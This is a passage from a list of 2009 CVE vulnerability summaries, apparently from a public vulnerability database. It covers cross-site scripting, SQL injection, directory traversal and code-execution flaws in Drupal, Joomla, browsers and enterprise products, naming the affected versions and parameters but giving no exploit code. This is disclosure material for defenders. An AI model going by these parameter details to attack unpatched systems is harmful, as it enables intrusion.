the PATH_INFO to (1) scrivi.php and (2) index.php. [CVE-2009-3488] Cross-site scripting (XSS) vulnerability in the Bibliography (aka Biblio) module 6.x-1.6 for Drupal allows remote authenticated users, with certain content-creation privileges, to inject arbitrary web script or HTML via the Title field, probably a different vulnerability than CVE-2009-3479. [CVE-2009-3481] A certain interface in the iCRM Basic (com_icrmbasic) component 1.4.2.31 for Joomla! does not require administrative authentication, which has unspecified impact and remote attack vectors. NOTE: the provenance of this information is unknown [CVE-2009-3479] Cross-site scripting (XSS) vulnerability in Bibliography (Biblio) 5.x before 5.x-1.17 and 6.x before 6.x-1.6, a module for Drupal, allows remote attackers, with "create content displayed by the Bibliography module" permissions, to inject arbitrary web script or HTML via a title. [CVE-2009-3469] Cross-site scripting (XSS) vulnerability in profiles/html/simpleSearch.do in IBM Lotus Connections 2.0.1 allows remote attackers to inject arbitrary web script or HTML via the name parameter. [CVE-2009-3467] Cross-site scripting (XSS) vulnerability in an unspecified method in Adobe ColdFusion 8.0, 8.0.1, and 9.0 allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2009-3466] Adobe Shockwave Player before 11.5.2.602 allows remote attackers to execute arbitrary code via a crafted web page that triggers memory corruption, related to an "invalid string length vulnerability." NOTE: some of these details are obtained from third party information. [CVE-2009-3465] Adobe Shockwave Player before 11.5.2.602 allows remote attackers to execute arbitrary code via crafted Shockwave content on a web site, related to an "invalid pointer vulnerability," a different issue than CVE-2009-3464. NOTE: some of these details are obtained from third party information. [CVE-2009-3464] Adobe Shockwave Player before 11.5.2.602 allows remote attackers to execute arbitrary code via crafted Shockwave content on a web site, related to an "invalid pointer vulnerability," a different issue than CVE-2009-3465. NOTE: some of these details are obtained from third party information. [CVE-2009-3463] Array index error in Adobe Shockwave Player before 11.5.2.602 allows remote attackers to execute arbitrary code via crafted Shockwave content on a web site. NOTE: some of these details are obtained from third party information. [CVE-2009-3457] Cisco ACE XML Gateway (AXG) and ACE Web Application Firewall (WAF) before 6.1 allow remote attackers to obtain sensitive information via an HTTP request that lacks a handler, as demonstrated by (1) an OPTIONS request or (2) a crafted GET request, leading to a Message-handling Errors message containing a certain client intranet IP address, aka Bug ID CSCtb82159. [CVE-2009-3453] Multiple cross-site scripting (XSS) vulnerabilities in IBM Lotus Quickr 8.1.0 services for WebSphere Portal allow remote attackers to inject arbitrary web script or HTML via the filename of a .odt file in a Lotus Quickr place, related to the Library template. [CVE-2009-3452] WebCoreModule.ashx in RADactive I-Load before 2008.2.5.0 allows remote attackers to obtain sensitive information via unspecified requests that trigger responses containing the saved-image folder pathname. [CVE-2009-3451] Directory traversal vulnerability in WebCoreModule.ashx in RADactive I-Load before 2008.2.5.0 allows remote attackers to read arbitrary files via unspecified vectors. [CVE-2009-3450] Multiple cross-site scripting (XSS) vulnerabilities in WebCoreModule.ashx in RADactive I-Load before 2008.2.5.0 allow remote attackers to inject arbitrary web script or HTML via parameters with names beginning with __ (underscore underscore) sequences, which are incompatible with an XSS protection mechanism provided by Microsoft ASP.NET. [CVE-2009-3444] Cross-site scripting (XSS) vulnerability in email.php in e107 0.7.16 and earlier allows remote attackers to inject arbitrary web script or HTML via the HTTP Referer header in a news.1 (aka news to email) action. [CVE-2009-3440] Cross-site scripting (XSS) vulnerability in Open Source Security Information Management (OSSIM) before 2.1.2 allows remote attackers to inject arbitrary web script or HTML via the option parameter to the default URI (aka the main menu). [CVE-2009-3437] Cross-site scripting (XSS) vulnerability in the live preview feature in the Markdown Preview module 6.x for Drupal allows remote attackers to inject arbitrary web script or HTML via "Markdown input." [CVE-2009-3436] Multiple SQL injection vulnerabilities in forum.asp in MaxWebPortal allow remote attackers to execute arbitrary SQL commands via the (1) FORUM_ID or (2) CAT_ID parameter. NOTE: this might overlap CVE-2005-1417. [CVE-2009-3435] Cross-site scripting (XSS) vulnerability in the variable editor in the Devel module 5.x before 5.x-1.2 and 6.x before 6.x-1.18, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via a variable name. [CVE-2009-3427] Cross-site scripting (XSS) vulnerability in Kayako SupportSuite 3.50.06 allows remote attackers to inject arbitrary web script or HTML via the subject field in a ticket. [CVE-2009-3420] Multiple cross-site scripting (XSS) vulnerabilities in index.php in the Publisher module 2.0 for Miniweb allow remote attackers to inject arbitrary web script or HTML via the (1) begin parameter and the (2) PATH_INFO. [CVE-2009-3419] SQL injection vulnerability in index.php in the Publisher module 2.0 for Miniweb allows remote attackers to execute arbitrary SQL commands via the historymonth parameter. [CVE-2009-3399] Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 7.0.6 and 8.1.5 allows remote attackers to affect integrity, related to WLS Console. [CVE-2009-3396] Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 9.0, 9.1, 9.2.3, 10.0.1, and 10.3 allows remote attackers to affect integrity, related to WLS Console. [CVE-2009-3384] Multiple unspecified vulnerabilities in WebKit in Apple Safari before 4.0.4 on Windows allow remote FTP servers to execute arbitrary code, cause a denial of service (application crash), or obtain sensitive information via a crafted directory listing in a reply. [CVE-2009-3374] The XPCVariant::VariantDataToJS function in the XPCOM implementation in Mozilla Firefox 3.0.x before 3.0.15 and 3.5.x before 3.5.4 does not enforce intended restrictions on interaction between chrome privileged code and objects obtained from remote web sites, which allows remote attackers to execute arbitrary JavaScript with chrome privileges via unspecified method calls, related to "doubly-wrapped objects." [CVE-2009-3371] Use-after-free vulnerability in Mozilla Firefox 3.5.x before 3.5.4 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code by creating JavaScript web-workers recursively. [CVE-2009-3368] Cross-site scripting (XSS) vulnerability in the Hotel Booking Reservation System (aka HBS or com_hbssearch) component for Joomla! allows remote attackers to inject arbitrary web script or HTML via the adult parameter in a showhoteldetails action to index.php. [CVE-2009-3367] Multiple cross-site scripting (XSS) vulnerabilities in An image gallery 1.0 allow remote attackers to inject arbitrary web script or HTML via the path parameter to (1) index.php and (2) main.php, and the (3) show parameter to main.php. NOTE: the provenance of this information is unknown [CVE-2009-3363] Cross-site scripting (XSS) vulnerability in the BUEditor module 5.x before 5.x-1.2 and 6.x before 6.x-1.4, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via input to the "plain textarea editor." [CVE-2009-3360] Multiple cross-site scripting (XSS) vulnerabilities in Datemill 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) return parameter to photo_view.php, and st parameter to (2) photo_search.php and (3) search.php. [CVE-2009-3359] Multiple cross-site scripting (XSS) vulnerabilities in Match Agency BiZ 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) important parameter to edit_profile.php and (2) pid parameter to report.php. [CVE-2009-3355] Cross-site scripting (XSS) vulnerability in profile.php in Datetopia Buy Dating Site 1.0 allows remote attackers to inject arbitrary web script or HTML via the s_r parameter. [CVE-2009-3348] Cross-site scripting (XSS) vulnerability in Datavore Gyro 5.0 allows remote attackers to inject arbitrary web script or HTML via the cid parameter in a cat action to the home component. [CVE-2009-3343] SQL injection vulnerability in details.asp in HotWeb Rentals allows remote attackers to execute arbitrary SQL commands via the PropId parameter. [CVE-2009-3339] Unspecified vulnerability in McAfee Email and Web Security Appliance 5.1 VMtrial allows remote attackers to read arbitrary files via unknown vectors, as demonstrated by a certain module in VulnDisco Pack Professional 8.9 through 8.11. NOTE: as of 20090917, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. [CVE-2009-3328] Cross-site scripting (XSS) vulnerability in sign.php in WX-Guestbook 1.1.208 allows remote attackers to inject arbitrary web script or HTML via the sName parameter (aka the name field). NOTE: some of these details are obtained from third party information. [CVE-2009-3320] Cross-site scripting (XSS) vulnerability in scrivi.php in Zenas PaoLink (aka Pao-Link) 1.0 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. [CVE-2009-3311] Cross-site scripting (XSS) vulnerability in index.php in RSSMediaScript allows remote attackers to inject arbitrary web script or HTML via the page parameter. [CVE-2009-3303] Cross-site scripting (XSS) vulnerability in www/help/tracker.php in GForge 4.5.14, 4.7 rc2, and 4.8.1 allows remote attackers to inject arbitrary web script or HTML via the helpname parameter. [CVE-2009-3300] Multiple cross-site scripting (XSS) vulnerabilities in the Identity Provider (IdP) 1.3.x before 1.3.4 and 2.x before 2.1.5, and the Service Provider 1.3.x before 1.3.5 and 2.x before 2.3, in Internet2 Middleware Initiative Shibboleth allow remote attackers to inject arbitrary web script or HTML via URLs that are encountered in redirections, and appear in automatically generated forms. [CVE-2009-3299] Cross-site scripting (XSS) vulnerability in the resume blocktype in Mahara before 1.0.13, and 1.1.x before 1.1.7, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-3287] lib/thin/connection.rb in Thin web server before 1.2.4 relies on the X-Forwarded-For header to determine the IP address of the client, which allows remote attackers to spoof the IP address and hide activities via a modified X-Forwarded-For header. [CVE-2009-3284] Directory traversal vulnerability in phpspot PHP BBS, PHP Image Capture BBS, PHP & CSS BBS, PHP BBS CE, PHP_RSS_Builder, and webshot, dated before 20090914, allows remote attackers to read arbitrary files via unspecified vectors. [CVE-2009-3283] Cross-site scripting (XSS) vulnerability in phpspot PHP BBS, PHP Image Capture BBS, PHP & CSS BBS, PHP BBS CE, PHP_RSS_Builder, and webshot, dated before 20090914, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to cookies. [CVE-2009-3272] Stack consumption vulnerability in WebKit.dll in WebKit in Apple Safari 3.2.3, and possibly other versions before 4.1.2, allows remote attackers to cause a denial of service (application crash) via JavaScript code that calls eval on a long string composed of A/ sequences. [CVE-2009-3265] Cross-site scripting (XSS) vulnerability in Opera 9 and 10 allows remote attackers to inject arbitrary web script or HTML via a (1) RSS or (2) Atom feed, related to the rendering of the application/rss+xml content type as "scripted content." NOTE: the vendor reportedly considers this behavior a "design feature," not a vulnerability. [CVE-2009-3264] The getSVGDocument method in Google Chrome before 3.0.195.21 omits an unspecified "access check," which allows remote web servers to bypass the Same Origin Policy and conduct cross-site scripting attacks via unknown vectors, related to a user's visit to a different web server that hosts an SVG document. [CVE-2009-3263] Cross-site scripting (XSS) vulnerability in Google Chrome 2.x and 3.x before 3.0.195.21 allows remote attackers to inject arbitrary web script or HTML via a (1) RSS or (2) Atom feed, related to the rendering of the application/rss+xml content type as XML "active content." [CVE-2009-3262] Cross-site scripting (XSS) vulnerability in the Self Service UI (SSUI) in IBM Tivoli Identity Manager (ITIM) 5.0.0.5 allows remote authenticated users to inject arbitrary web script or HTML via the last name field in a profile. [CVE-2009-3260] Cross-site scripting (XSS) vulnerability in LiveStreet 0.2 allows remote attackers to inject arbitrary web script or HTML via the header of the topic in a comment. [CVE-2009-3256] Cross-site scripting (XSS) vulnerability in include/ajax/blogInfo.php in LiveStreet 0.2 allows remote attackers to inject arbitrary web script or HTML via the URI, as demonstrated by a SCRIPT element in an arbitrary parameter such as the asd parameter. [CVE-2009-3247] Cross-site scripting (XSS) vulnerability in the Activities module in vtiger CRM 5.0.4 allows remote attackers to inject arbitrary web script or HTML via the action parameter to phprint.php. NOTE: the query_string vector is already covered by CVE-2008-3101.3. [CVE-2009-3240] Cross-site scripting (XSS) vulnerability in the Happy Linux XF-Section module 1.12a for XOOPS allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-3227] Cross-site scripting (XSS) vulnerability in index.php in AlmondSoft Almond Classifieds Ads Enterprise and Almond Affiliate Network Classifieds allows remote attackers to inject arbitrary web script or HTML via the city parameter in a search action. NOTE: some of these details are obtained from third party information. [CVE-2009-3225] Multiple cross-site scripting (XSS) vulnerabilities in AlmondSoft Almond Classifieds Wap and Pro, and possibly Almond Affiliate Network Classifieds, allow remote attackers to inject arbitrary web script or HTML via (1) the page parameter in a browse action to index.php or (2) the addr parameter to gmap.php. NOTE: some of these details are obtained from third party information. [CVE-2009-3222] Cross-site scripting (XSS) vulnerability in index.php in FreeWebScriptz Honest Traffic (FWSHT) 1.x allows remote attackers to inject arbitrary web script or HTML via the msg parameter. [CVE-2009-3219] Directory traversal vulnerability in a.php in AR Web Content Manager (AWCM) 2.1, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the a parameter. [CVE-2009-3218] SQL injection vulnerability in control/login.php in AR Web Content Manager (AWCM) 2.1, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the username parameter. [CVE-2009-3210] Multiple cross-site scripting (XSS) vulnerabilities in the Print (aka Printer, e-mail and PDF versions) module 5.x before 5.x-4.8 and 6.x before 6.x-1.8, a module for Drupal, allow remote authenticated users to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-3206] Multiple cross-site scripting (XSS) vulnerabilities in the ImageCache module 5.x before 5.x-2.5 and 6.x before 6.x-2.0-beta10, a module for Drupal, allow remote authenticated users, with "administer imagecache" permissions, to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-3204] Multiple cross-site scripting (XSS) vulnerabilities in Stiva Forum 1.0 allow remote attackers to inject arbitrary web script or HTML via the id parameter to (1) demo.php and (2) forum.php, and the PATH_INFO to (3) include_forum.php. [CVE-2009-3202] Cross-site scripting (XSS) vulnerability in search.php in ULoKI PHP Forum 2.1 allows remote attackers to inject arbitrary web script or HTML via the term parameter. [CVE-2009-3199] Uebimiau Webmail 3.2.0-2.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database with usernames and password hashes via a direct request for system_admin/admin.ucf. [CVE-2009-3198] Cross-site scripting (XSS) vulnerability in search.php in JCE-Tech Affiliate Master Datafeed Parser Script 2.0 allows remote attackers to inject arbitrary web script or HTML via the search parameter. [CVE-2009-3197] Cross-site scripting (XSS) vulnerability in search.php in JCE-Tech PHP Calendars Script allows remote attackers to inject arbitrary web script or HTML via the search parameter. [CVE-2009-3196] Cross-site scripting (XSS) vulnerability in index.php in JCE-Tech PHP Video Script allows remote attackers to inject arbitrary web script or HTML via the key parameter. [CVE-2009-3195] Multiple cross-site scripting (XSS) vulnerabilities in JCE-Tech Auction RSS Content Script 3.0 allow remote attackers to inject arbitrary web script or HTML via the id parameter to (1) rss.php and (2) search.php. [CVE-2009-3194] Cross-site scripting (XSS) vulnerability in index.php in JCE-Tech SearchFeed Script allows remote attackers to inject arbitrary web script or HTML via the search parameter. [CVE-2009-3192] Multiple cross-site scripting (XSS) vulnerabilities in index.php in LinkorCMS 1.2 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the searchstr parameter in a search action [CVE-2009-3191] Multiple cross-site scripting (XSS) vulnerabilities in PAD Site Scripts 3.6 allow remote attackers to inject arbitrary web script or HTML via the cat parameter to (1) rss.php and (2) opml.php. [CVE-2009-3189] Cross-site scripting (XSS) vulnerability in search.php in DigiOz Guestbook 1.7.2 allows remote attackers to inject arbitrary web script or HTML via the search_term parameter. [CVE-2009-3187] Cross-site scripting (XSS) vulnerability in gamelist.php in Stand Alone Arcade 1.1 allows remote attackers to inject arbitrary web script or HTML via the cat parameter. [CVE-2009-3186] Multiple cross-site scripting (XSS) vulnerabilities in VideoGirls BiZ allow remote attackers to inject arbitrary web script or HTML via the (1) t parameter to forum.php, (2) profile_name parameter to profile.php, and (3) p parameter to view.php. [CVE-2009-3171] Multiple cross-site scripting (XSS) vulnerabilities in Anantasoft Gazelle CMS 1.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) user parameter to user.php or (2) lookup parameter to search.php. [CVE-2009-3166] token.cgi in Bugzilla 3.4rc1 through 3.4.1 places a password in a URL at the beginning of a login session that occurs immediately after a password reset, which allows context-dependent attackers to discover passwords by reading (1) web-server access logs, (2) web-server Referer logs, or (3) the browser history. [CVE-2009-3165] SQL injection vulnerability in the Bug.create WebService function in Bugzilla 2.23.4 through 3.0.8, 3.1.1 through 3.2.4, and 3.3.1 through 3.4.1 allows remote attackers to execute arbitrary SQL commands via unspecified parameters. [CVE-2009-3164] Unspecified vulnerability in the IPv6 networking stack in Sun Solaris 10, and OpenSolaris snv_01 through snv_82 and snv_111 through snv_122, when a Cassini GigaSwift Ethernet Adapter (aka CE) interface is used, allows remote attackers to cause a denial of service (panic) via vectors involving jumbo frames. NOTE: this issue exists because of an incomplete fix for CVE-2009-2136. [CVE-2009-3162] Cross-site scripting (XSS) vulnerability in Multi Website 1.5 allows remote attackers to inject arbitrary web script or HTML via the search parameter in a search action to the default URI. [CVE-2009-3161] The server in IBM WebSphere MQ 7.0.0.1, 7.0.0.2, and 7.0.1.0 allows attackers to cause a denial of service (trap) or possibly have unspecified other impact via malformed data. [CVE-2009-3160] IBM WebSphere MQ 6.x through 6.0.2.7, 7.0.0.0, 7.0.0.1, 7.0.0.2, and 7.0.1.0, when read ahead or asynchronous message consumption is enabled, allows attackers to have an unspecified impact via unknown vectors, related to a "memory overwrite" issue. [CVE-2009-3159] Unspecified vulnerability in the rriDecompress function in IBM WebSphere MQ 7.0.0.0, 7.0.0.1, and 7.0.0.2 allows remote attackers to cause a denial of service via unknown vectors. [CVE-2009-3158] admin/files.php in simplePHPWeb 0.2 does not require authentication, which allows remote attackers to perform unspecified administrative actions via unknown vectors. NOTE: some of these details are obtained from third party information. [CVE-2009-3157] Cross-site scripting (XSS) vulnerability in the Calendar module 6.x before 6.x-2.2 for Drupal allows remote authenticated users, with "create new content types" privileges, to inject arbitrary web script or HTML via the title of a content type. [CVE-2009-3156] Cross-site scripting (XSS) vulnerability in the Date Tools sub-module in the Date module 6.x before 6.x-2.3 for Drupal allows remote authenticated users, with "use date tools" or "administer content types" privileges, to inject arbitrary web script or HTML via a "Content type label" field. [CVE-2009-3155] Cross-site scripting (XSS) vulnerability in gmap.php in the Almond Classifieds (com_aclassf) component 7.5 for Joomla! allows remote attackers to inject arbitrary web script or HTML via the addr parameter. [CVE-2009-3153] Multiple cross-site scripting (XSS) vulnerabilities in x10 MP3 Search engine 1.6.5 allow remote attackers to inject arbitrary web script or HTML via the (1) pic_id parameter to includes/video_ad.php, (2) category parameter to linkvideos_listing.php, id parameter to (3) templates/header1.php and (4) mp3/lyrics.php, key parameter to (5) video_listing.php and (6) adult/video_listing.php, and name parameter to (7) mp3/embed.php and (8) mp3/info.php. [CVE-2009-3152] Multiple cross-site scripting (XSS) vulnerabilities in becommunity/community/index.php in NTSOFT BBS E-Market Professional allow remote attackers to inject arbitrary web script or HTML via the (1) page, (2) bt_code, and (3) b_no parameters in a board view action. [CVE-2009-3150] SQL injection vulnerability in index.php in Multi Website 1.5 allows remote attackers to execute arbitrary SQL commands via the Browse parameter in a vote action. [CVE-2009-3147] Cross-site scripting (XSS) vulnerability in showproduct.php in ReviewPost Pro vB3 allows remote attackers to inject arbitrary web script or HTML via the date parameter. [CVE-2009-3146] Cross-site scripting (XSS) vulnerability in search_advance.php in ArticleFriend Script allows remote attackers to inject arbitrary web script or HTML via the SearchWd parameter. NOTE: the provenance of this information is unknown [CVE-2009-3126] Integer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a crafted PNG image file, aka "GDI+ PNG Integer Overflow Vulnerability." [CVE-2009-3125] SQL injection vulnerability in the Bug.search WebService function in Bugzilla 3.3.2 through 3.4.1, and 3.5, allows remote attackers to execute arbitrary SQL commands via unspecified parameters. [CVE-2009-3121] Cross-site scripting (XSS) vulnerability in the Ajax Table module 5.x for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-3120] Cross-site scripting (XSS) vulnerability in public/index.php in BIGACE Web CMS 2.6 allows remote attackers to inject arbitrary web script or HTML via the id parameter. NOTE: some of these details are obtained from third party information. [CVE-2009-3106] The Servlet Engine/Web Container component in IBM WebSphere Application Server (WAS) 6.0.2 before 6.0.2.37 does not properly implement security constraints on the (1) doGet and (2) doTrace methods, which allows remote attackers to bypass intended access restrictions and obtain sensitive information via a crafted HTTP HEAD request to a Web Application. [CVE-2009-3105] Cross-site scripting (XSS) vulnerability in IBM Lotus iNotes (aka Domino Web Access or DWA) before 211.241 for Domino 8.0.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka SPR EZEL7UURYC. [CVE-2009-3068] Unrestricted file upload vulnerability in the RoboHelpServer Servlet (robohelp/server) in Adobe RoboHelp Server 8 allows remote attackers to execute arbitrary code by uploading a Java Archive (.jsp) file during a PUBLISH action, then accessing it via a direct request to the file in the robohelp/robo/reserved/web directory under its sessionid subdirectory, as demonstrated by the vd_adobe module in VulnDisco Pack Professional 8.7 through 8.11. [CVE-2009-3067] Cross-site scripting (XSS) vulnerability in index.php in Reservation Manager allows remote attackers to inject arbitrary web script or HTML via the resman_startdate parameter. [CVE-2009-3066] Multiple cross-site scripting (XSS) vulnerabilities in PropertyWatchScript.com Property Watch 2.0 allow remote attackers to inject arbitrary web script or HTML via the (1) videoid parameter to tools/email.php and (2) redirect parameter to tools/login.php. [CVE-2009-3060] Multiple cross-site scripting (XSS) vulnerabilities in Joker Board (aka JBoard) 2.0 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the notice parameter to editform.php, (2) the edit_user_message parameter to core/edit_user_message.php, or (3) the user_title parameter to inc/head.inc.php, reachable through any PHP script. [CVE-2009-3057] Multiple cross-site scripting (XSS) vulnerabilities in AOM Software Beex 3 allow remote attackers to inject arbitrary web script or HTML via the navaction parameter to (1) news.php and (2) partneralle.php. [CVE-2009-3036] Cross-site scripting (XSS) vulnerability in the console in Symantec IM Manager 8.3 and 8.4 before 8.4.13 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-3035] The web console in Symantec Altiris Notification Server 6.0.x before 6.0 SP3 R12 uses a hardcoded key that can decrypt SQL Server credentials and certain discovery credentials, and stores this key on the Notification Server machine, which allows local users to obtain sensitive information and possibly execute arbitrary code by decrypting and using these credentials. [CVE-2009-3033] Buffer overflow in the RunCmd method in the Altiris eXpress NS Console Utilities ActiveX control in AeXNSConsoleUtilities.dll in the web console in Symantec Altiris Deployment Solution 6.9.x, Altiris Notification Server 6.0.x, and Management Platform 7.0.x allows remote attackers to execute arbitrary code via a long string in the second argument. [CVE-2009-3030] Cross-site scripting (XSS) vulnerability in Symantec SecurityExpressions Audit and Compliance Server 4.1.1, 4.1, and earlier allows remote attackers to inject arbitrary web script or HTML via vectors that trigger an error message in a response, related to an "HTML Injection issue." [CVE-2009-3029] Cross-site scripting (XSS) vulnerability in the console in Symantec SecurityExpressions Audit and Compliance Server 4.1.1, 4.1, and earlier allows remote authenticated users to inject arbitrary web script or HTML via "external client input" that triggers crafted error messages. [CVE-2009-3027] VRTSweb.exe in VRTSweb in Symantec Backup Exec Continuous Protection Server (CPS) 11d, 12.0, and 12.5 [CVE-2009-3021] Cross-site scripting (XSS) vulnerability in Site Calendar 'mycaljp' plugin 2.0.0 through 2.0.6, as used in the Japanese extended package of Geeklog 1.5.0 through 1.5.2 and when distributed 20090629 or earlier, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-3015] QtWeb 3.0 Builds 001 and 003 does not properly block javascript: and data: URIs in Refresh and Location headers in HTTP responses, which allows remote attackers to conduct cross-site scripting (XSS) attacks via vectors related to (1) injecting a Refresh header that contains a javascript: URI, (2) entering a javascript: URI when specifying the content of a Refresh header, (3) injecting a Refresh header that contains JavaScript sequences in a data:text/html URI, (4) entering a data:text/html URI with JavaScript sequences when specifying the content of a Refresh header, (5) injecting a Location header that contains JavaScript sequences in a data:text/html URI, or (6) entering a data:text/html URI with JavaScript sequences when specifying the content of a Location header. [CVE-2009-3009] Cross-site scripting (XSS) vulnerability in Ruby on Rails 2.x before 2.2.3, and 2.3.x before 2.3.4, allows remote attackers to inject arbitrary web script or HTML by placing malformed Unicode strings into a form helper. [CVE-2009-3006] Maxthon Browser 2.5.3.80 UNICODE allows remote attackers to spoof the address bar, via window.open with a relative URI, to show an arbitrary URL on the web site visited by the victim, as demonstrated by a visit to an attacker-controlled web page, which triggers a spoofed login form for the site containing that page. [CVE-2009-3005] Lunascape 5.1.3 and 5.1.4 allows remote attackers to spoof the address bar, via window.open with a relative URI, to show an arbitrary URL on the web site visited by the victim, as demonstrated by a visit to an attacker-controlled web page, which triggers a spoofed login form for the site containing that page. NOTE: a related attack was reported in which an arbitrary file: URL is shown. [CVE-2009-3004] Avant Browser 11.7 Builds 35 and 36 allows remote attackers to spoof the address bar, via window.open with a relative URI, to show an arbitrary URL on the web site visited by the victim, as demonstrated by a visit to an attacker-controlled web page, which triggers a spoofed login form for the site containing that page. NOTE: a related attack was reported in which an arbitrary file: URL is shown. [CVE-2009-3003] Microsoft Internet Explorer 6 through 8 allows remote attackers to spoof the address bar, via window.open with a relative URI, to show an arbitrary URL on the web site visited by the victim, as demonstrated by a visit to an attacker-controlled web page, which triggers a spoofed login form for the site containing that page. [CVE-2009-3000] The sockfs module in the kernel in Sun Solaris 10 and OpenSolaris snv_41 through snv_122, when Network Cache Accelerator (NCA) logging is enabled, allows remote attackers to cause a denial of service (panic) via unspecified web-server traffic that triggers a NULL pointer dereference in the nl7c_http_log function, related to "improper http response handling." [CVE-2009-2967] Multiple cross-site scripting (XSS) vulnerabilities in Buildbot 0.7.6 through 0.7.11p2 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, different vulnerabilities than CVE-2009-2959. [CVE-2009-2965] Cross-site scripting (XSS) vulnerability in entry/index.jsp in Radvision Scopia 5.7, and possibly other versions before SD 7.0.100, allows remote attackers to inject arbitrary web script or HTML via the page parameter. [CVE-2009-2963] Unspecified vulnerability in the update feature in Toolbar Uninstaller 1.0.2 allows remote attackers to force the download and execution of arbitrary files via attack vectors related to a "malformed update url and a malformed update website." [CVE-2009-2959] Cross-site scripting (XSS) vulnerability in the waterfall web status view (status/web/waterfall.py) in Buildbot 0.7.6 through 0.7.11p1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-2956] The (1) Net.Commerce and (2) Net.Data components in IBM WebSphere Commerce Suite store sensitive information under the web root with insufficient access control, which allows remote attackers to discover passwords, and database and filesystem details, via direct requests for configuration files. [CVE-2009-2947] Cross-site scripting (XSS) vulnerability in Xapian Omega before 1.0.16 allows remote attackers to inject arbitrary web script or HTML via unspecified CGI parameter values, which are sometimes included in exception messages. [CVE-2009-2945] weblogin/login.fcgi (aka the WebLogin login script) in Stanford University WebAuth 3.5.5, 3.6.0, and 3.6.1 places passwords in URLs in certain circumstances involving conversion of a POST request to a GET request, which allows context-dependent attackers to discover passwords by reading (1) web-server access logs, (2) web-server Referer logs, or (3) the browser history. [CVE-2009-2937] Cross-site scripting (XSS) vulnerability in Planet 2.0 and Planet Venus allows remote attackers to inject arbitrary web script or HTML via the SRC attribute of an IMG element in a feed. [CVE-2009-2936] DISPUTED The Command Line Interface (aka Server CLI or administration interface) in the master process in the reverse proxy server in Varnish before 2.1.0 does not require authentication for commands received through a TCP port, which allows remote attackers to (1) execute arbitrary code via a vcl.inline directive that provides a VCL configuration file containing inline C code [CVE-2009-2932] Cross-site scripting (XSS) vulnerability in uddiclient/process in the UDDI client in SAP NetWeaver Application Server (Java) 7.0 allows remote attackers to inject arbitrary web script or HTML via the TModel Key field. [CVE-2009-2930] Cross-site scripting (XSS) vulnerability in the Search feature in elka CMS (aka Elkapax) allows remote attackers to inject arbitrary web script or HTML via the q parameter to the default URI. [CVE-2009-2928] Cross-site scripting (XSS) vulnerability in login.php in TGS Content Management 0.x allows remote attackers to inject arbitrary web script or HTML via the previous_page parameter, a different vector than CVE-2008-6839. [CVE-2009-2920] Multiple cross-site scripting (XSS) vulnerabilities in Elvin 1.2.2 allow remote attackers to inject arbitrary web script or HTML via the (1) component and (2) priority parameters to buglist.php [CVE-2009-2919] Cross-site scripting (XSS) vulnerability in Boonex Orca 2.0 and 2.0.2 allows remote authenticated users to inject arbitrary web script or HTML via the topic title field. [CVE-2009-2914] Cross-site scripting (XSS) vulnerability in index.php in XZero Community Classifieds 4.97.8 and earlier allows remote attackers to inject arbitrary web script or HTML via the name of an uploaded file. NOTE: the provenance of this information is unknown [CVE-2009-2913] Cross-site scripting (XSS) vulnerability in index.php in XZero Community Classifieds 4.97.8 allows remote attackers to inject arbitrary web script or HTML via the URI. NOTE: the provenance of this information is unknown [CVE-2009-2907] Multiple cross-site scripting (XSS) vulnerabilities in SpringSource tc Server 6.0.20.B and earlier, Application Management Suite (AMS) before 2.0.0.SR4, Hyperic HQ Open Source before 4.2.x, Hyperic HQ 4.0 Enterprise before 4.0.3.2, and Hyperic HQ 4.1 Enterprise before 4.1.2.1 allow remote attackers to inject arbitrary web script or HTML via the description field and unspecified "input fields." [CVE-2009-2893] Multiple cross-site scripting (XSS) vulnerabilities in index.php in XZero Community Classifieds 4.97.8 allow remote attackers to inject arbitrary web script or HTML via (1) the postevent parameter in a post action or (2) the _xzcal_y parameter. [CVE-2009-2890] Cross-site scripting (XSS) vulnerability in results.php in PHP Scripts Now Riddles allows remote attackers to inject arbitrary web script or HTML via the searchquery parameter. [CVE-2009-2889] Cross-site scripting (XSS) vulnerability in index.php in PHP Scripts Now Hangman allows remote attackers to inject arbitrary web script or HTML via the letters parameter. [CVE-2009-2887] Cross-site scripting (XSS) vulnerability in bios.php in 